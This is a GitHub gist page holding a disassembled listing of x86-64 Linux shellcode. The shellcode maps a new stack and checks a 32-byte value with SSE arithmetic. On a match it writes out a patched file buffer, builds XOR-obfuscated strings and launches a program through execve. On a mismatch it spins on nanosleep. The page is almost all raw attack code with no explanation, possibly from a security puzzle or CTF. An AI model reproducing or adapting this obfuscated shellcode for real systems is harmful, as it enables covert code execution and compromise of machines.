Skip to content

Instantly share code, notes, and snippets.

@L4ys

L4ys/shellcode.asm Secret

Last active December 31, 2016 05:40
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save L4ys/fd2cb02417f21357ab83ddd1f412da78 to your computer and use it in GitHub Desktop.
Save L4ys/fd2cb02417f21357ab83ddd1f412da78 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
shellcode.asm
seg000:0000000000000000 48 89 E5 mov rbp, rsp
seg000:0000000000000003 48 83 ED 78 sub rbp, 78h
seg000:0000000000000007 BF 00 00 00 00 mov edi, 0
seg000:000000000000000C BE 00 00 10 00 mov esi, 100000h
seg000:0000000000000011 BA 03 00 00 00 mov edx, 3
seg000:0000000000000016 41 BA 22 00 00 00 mov r10d, 22h ; '"'
seg000:000000000000001C 49 C7 C0 FF FF FF FF mov r8, 0FFFFFFFFFFFFFFFFh
seg000:0000000000000023 41 B9 00 00 00 00 mov r9d, 0
seg000:0000000000000029 B8 09 00 00 00 mov eax, 9
seg000:000000000000002E 0F 05 syscall
seg000:0000000000000030 48 89 C4 mov rsp, rax
seg000:0000000000000033 48 81 C4 00 FF 0F 00 add rsp, 0FFF00h
seg000:000000000000003A 48 B8 FE C4 00 37 13 00 C3 33 mov rax, 33C300133700C4FEh
seg000:0000000000000044 50 push rax
seg000:0000000000000045 48 B8 D3 C0 00 4D D3 00 BE B4 mov rax, 0B4BE00D34D00C0D3h
seg000:000000000000004F 50 push rax
seg000:0000000000000050 F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp]
seg000:0000000000000055
seg000:0000000000000055 loc_55:
seg000:0000000000000055 F3 0F 6F 8D A0 00 00 00 movdqu xmm1, xmmword ptr [rbp+160]
seg000:000000000000005D F3 0F 6F 95 B0 00 00 00 movdqu xmm2, xmmword ptr [rbp+176]
seg000:0000000000000065 B9 2A 00 00 00 mov ecx, 42
seg000:000000000000006A
seg000:000000000000006A loc_6A: ; CODE XREF: sub_3A+7Cj
seg000:000000000000006A F3 0F 6F D9 movdqu xmm3, xmm1
seg000:000000000000006E 66 0F 15 CA unpckhpd xmm1, xmm2
seg000:0000000000000072 66 0F 14 D3 unpcklpd xmm2, xmm3
seg000:0000000000000076 F2 0F 70 C9 8D pshuflw xmm1, xmm1, 141
seg000:000000000000007B F2 0F 70 D2 39 pshuflw xmm2, xmm2, 57
seg000:0000000000000080 F3 0F 70 C9 D2 pshufhw xmm1, xmm1, 210
seg000:0000000000000085 F3 0F 70 D2 87 pshufhw xmm2, xmm2, 135
seg000:000000000000008A F3 0F 6F D9 movdqu xmm3, xmm1
seg000:000000000000008E 66 0F 73 F3 0D psllq xmm3, 0Dh
seg000:0000000000000093 66 0F 73 D1 33 psrlq xmm1, 33h ; '3'
seg000:0000000000000098 66 0F EF CB pxor xmm1, xmm3
seg000:000000000000009C 66 0F EF CC pxor xmm1, xmm4
seg000:00000000000000A0 F3 0F 6F DA movdqu xmm3, xmm2
seg000:00000000000000A4 66 0F 73 D3 11 psrlq xmm3, 11h
seg000:00000000000000A9 66 0F 73 F2 2F psllq xmm2, 2Fh ; '/'
seg000:00000000000000AE 66 0F EF D3 pxor xmm2, xmm3
seg000:00000000000000B2 66 0F EF D4 pxor xmm2, xmm4
seg000:00000000000000B6 E2 B2 loop loc_6A
seg000:00000000000000B8 48 B8 18 02 7D 0F 90 EA 7A AF mov rax, 0AF7AEA900F7D0218h
seg000:00000000000000C2 50 push rax
seg000:00000000000000C3 48 B8 6C 19 E2 79 98 63 76 8A mov rax, 8A76639879E2196Ch
seg000:00000000000000CD 50 push rax
seg000:00000000000000CE F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp]
seg000:00000000000000D3 66 0F 38 29 E1 pcmpeqq xmm4, xmm1
seg000:00000000000000D8 66 0F D7 C4 pmovmskb eax, xmm4
seg000:00000000000000DC 3D FF FF 00 00 cmp eax, 0FFFFh
seg000:00000000000000E1 0F 85 51 01 00 00 jnz loc_238
seg000:00000000000000E7 48 B8 80 FC F2 9F F2 A7 C0 74 mov rax, 74C0A7F29FF2FC80h
seg000:00000000000000F1 50 push rax
seg000:00000000000000F2 48 B8 B2 BD FA AE B9 62 36 C2 mov rax, 0C23662B9AEFABDB2h
seg000:00000000000000FC 50 push rax
seg000:00000000000000FD F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp]
seg000:0000000000000102 66 0F 38 29 E2 pcmpeqq xmm4, xmm2
seg000:0000000000000107 66 0F D7 C4 pmovmskb eax, xmm4
seg000:000000000000010B 3D FF FF 00 00 cmp eax, 0FFFFh
seg000:0000000000000110 0F 85 22 01 00 00 jnz loc_238
seg000:0000000000000116 4C 8B A5 1C EE FF FF mov r12, [rbp-4580] ; file ptr
seg000:000000000000011D 66 41 C7 44 24 25 C2 06 mov word ptr [r12+25h], 6C2h
seg000:0000000000000125 48 BB 9A 53 0D 6C 55 81 E4 07 mov rbx, 7E481556C0D539Ah
seg000:000000000000012F 48 B8 B5 21 3C 5E 3F B3 9C 07 mov rax, 79CB33F5E3C21B5h
seg000:0000000000000139 48 31 D8 xor rax, rbx
seg000:000000000000013C 50 push rax
seg000:000000000000013D 48 B8 B5 37 68 1A 7A F2 8C 6A mov rax, 6A8CF27A1A6837B5h
seg000:0000000000000147 48 31 D8 xor rax, rbx
seg000:000000000000014A 50 push rax
seg000:000000000000014B 48 89 E7 mov rdi, rsp
seg000:000000000000014E BE 42 02 00 00 mov esi, 242h
seg000:0000000000000153 BA 80 01 00 00 mov edx, 180h
seg000:0000000000000158 B8 02 00 00 00 mov eax, 2
seg000:000000000000015D 0F 05 syscall ; open
seg000:000000000000015F 49 89 C5 mov r13, rax
seg000:0000000000000162 B8 57 00 00 00 mov eax, 87
seg000:0000000000000167 0F 05 syscall
seg000:0000000000000169 4C 89 EF mov rdi, r13
seg000:000000000000016C 4C 89 E6 mov rsi, r12
seg000:000000000000016F BA 00 02 01 00 mov edx, 10200h
seg000:0000000000000174 B8 01 00 00 00 mov eax, 1 ; write
seg000:0000000000000179 0F 05 syscall
seg000:000000000000017B 4C 89 E8 mov rax, r13
seg000:000000000000017E 48 89 E7 mov rdi, rsp
seg000:0000000000000181 48 89 E6 mov rsi, rsp
seg000:0000000000000184
seg000:0000000000000184 loc_184: ; CODE XREF: sub_3A+160j
seg000:0000000000000184 48 31 D2 xor rdx, rdx
seg000:0000000000000187 B9 0A 00 00 00 mov ecx, 0Ah
seg000:000000000000018C 48 F7 F1 div rcx
seg000:000000000000018F 80 C2 30 add dl, 30h ; '0'
seg000:0000000000000192 88 17 mov [rdi], dl
seg000:0000000000000194 48 FF C7 inc rdi
seg000:0000000000000197 48 85 C0 test rax, rax
seg000:000000000000019A 75 E8 jnz short loc_184
seg000:000000000000019C C6 07 00 mov byte ptr [rdi], 0
seg000:000000000000019F 48 FF CF dec rdi
seg000:00000000000001A2
seg000:00000000000001A2 loc_1A2: ; CODE XREF: sub_3A+173j
seg000:00000000000001A2 8A 07 mov al, [rdi]
seg000:00000000000001A4 8A 1E mov bl, [rsi]
seg000:00000000000001A6 88 1F mov [rdi], bl
seg000:00000000000001A8 88 06 mov [rsi], al
seg000:00000000000001AA 48 39 F7 cmp rdi, rsi
seg000:00000000000001AD 7C F3 jl short loc_1A2
seg000:00000000000001AF 48 BB 9A 53 0D 6C 55 81 E4 07 mov rbx, 7E481556C0D539Ah
seg000:00000000000001B9 48 B8 E9 36 61 0A 7A E7 80 28 mov rax, 2880E77A0A6136E9h
seg000:00000000000001C3 48 31 D8 xor rax, rbx
seg000:00000000000001C6 50 push rax
seg000:00000000000001C7 48 B8 BA 73 22 1C 27 EE 87 28 mov rax, 2887EE271C2273BAh
seg000:00000000000001D1 48 31 D8 xor rax, rbx
seg000:00000000000001D4 50 push rax
seg000:00000000000001D5 4C 8D 74 24 02 lea r14, [rsp+50h+var_4E]
seg000:00000000000001DA 48 8B 55 38 mov rdx, [rbp+56]
seg000:00000000000001DE 48 8B 92 28 FC 31 00 mov rdx, [rdx+31FC28h]
seg000:00000000000001E5 48 B8 F6 35 22 09 2D E4 E4 07 mov rax, 7E4E42D092235F6h
seg000:00000000000001EF 48 31 D8 xor rax, rbx
seg000:00000000000001F2 50 push rax
seg000:00000000000001F3 48 B8 B5 23 7F 03 36 AE 97 62 mov rax, 6297AE36037F23B5h
seg000:00000000000001FD 48 31 D8 xor rax, rbx
seg000:0000000000000200 50 push rax
seg000:0000000000000201 48 89 E7 mov rdi, rsp
seg000:0000000000000204 48 B8 FF 21 0D 6C 55 81 E4 07 mov rax, 7E481556C0D21FFh
seg000:000000000000020E 48 31 D8 xor rax, rbx
seg000:0000000000000211 48 B8 FD 3E 68 33 25 ED 85 7E mov rax, 7E85ED2533683EFDh
seg000:000000000000021B 48 31 D8 xor rax, rbx
seg000:000000000000021E 50 push rax
seg000:000000000000021F 48 89 E6 mov rsi, rsp
seg000:0000000000000222 6A 00 push 0
seg000:0000000000000224 41 56 push r14
seg000:0000000000000226 56 push rsi
seg000:0000000000000227 48 89 E6 mov rsi, rsp
seg000:000000000000022A B8 3B 00 00 00 mov eax, 59
seg000:000000000000022F 0F 05 syscall
seg000:0000000000000231 B8 3C 00 00 00 mov eax, 60
seg000:0000000000000236 0F 05 syscall
seg000:0000000000000238
seg000:0000000000000238 loc_238: ; CODE XREF: sub_3A+A7j
seg000:0000000000000238 ; sub_3A+D6j ...
seg000:0000000000000238 68 37 13 00 00 push 1337h
seg000:000000000000023D 68 37 13 00 00 push 1337h
seg000:0000000000000242 48 89 E7 mov rdi, rsp
seg000:0000000000000245 BE 00 00 00 00 mov esi, 0
seg000:000000000000024A B8 23 00 00 00 mov eax, 35
seg000:000000000000024F 0F 05 syscall
seg000:0000000000000251 EB E5 jmp short loc_238
seg000:0000000000000251
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment